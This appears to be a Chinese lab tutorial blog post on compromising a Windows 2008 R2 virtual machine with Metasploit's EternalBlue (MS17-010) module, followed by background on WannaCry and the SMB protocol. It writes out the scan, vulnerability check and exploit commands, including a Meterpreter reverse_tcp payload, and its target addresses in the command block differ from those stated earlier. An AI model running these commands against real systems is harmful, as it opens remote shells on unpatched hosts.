使用msf--永恒之蓝攻击模块windows2008 R2 虚机

使用msf–永恒之蓝攻击模块windows2008 R2 虚机

准备:kali虚机、window2008 R2 虚拟
做之前请保证kali可以ping通win2008
kali的IP地址是192.168.29.128
win2008的IP地址是192.168.29.129
首先进入kali的msf
在这里插入图片描述msf是集成在kali镜像中的攻击框架,里面继承了许多的漏洞和攻击载荷,下面就让我们一睹它的风采吧。
在这里插入图片描述使用auxiliary/scanner/smb/smb_version探测目标主机是不是开放了445端口,并根据提示设置攻击参数。
在这里插入图片描述在这里插入图片描述输入“run”直接运行。话不多说,直接上图。
在这里插入图片描述如图说明192.168.29.129开放了445端口。接下来我们直接利用永恒之蓝漏洞检测模块进一步检测是不是存在此漏洞。
在这里插入图片描述在这里插入图片描述如图说明192.168.29.129这台主机存在永恒之蓝漏洞。让我们进一步利用这个漏洞进行攻击。
在这里插入图片描述如图启动了攻击,对参数做以下说明:

use exploit/windows/smb/ms17_010_eternalblue //使用永恒之蓝攻击模块

set payload windows/meterpreter/reverse_tcp //设置一个Payload,使攻击机接受来自目标主机的session

set rhosts 192.168.205.150 //设置目标主机地址

set lhost 192.168.205.148 //设置接受payload的地址,我们这里设置MSF的地址

set LPORT 5555 // 设置接受的端口,这个自己自定义,只要不与其它端口冲突就可以

Exploit //执行攻击命令

在这里插入图片描述如图便成功入侵了192.168.29.129这台存在永恒之蓝漏洞的虚拟机。

对于此次的整个的入侵过程有如下几个过程,信息收集(探测开放了445端口的主机,进一步检测是否存在永恒之蓝漏洞)、确定了漏洞,下一步就是漏洞的利用,永恒之蓝攻击模块,设定好参数,运行攻击。

最后普及几点小知识:
1、什么是“永恒之蓝”
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
2、什么是smb?
SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。SMB是一个应用层协议,可以工作在NETBIOS协议之上(TCP/139)或者TCP协议(TCP/445)之上;SMB协议在Windows主机默认安装;SMB是一种客户机/服务器,请求/响应协议。通过SMB协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求;
所以我们仔细观察可以发现,msf里面的攻击模块的路径是以smb定义的。
一个默默努力的男孩子。

  • 6
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值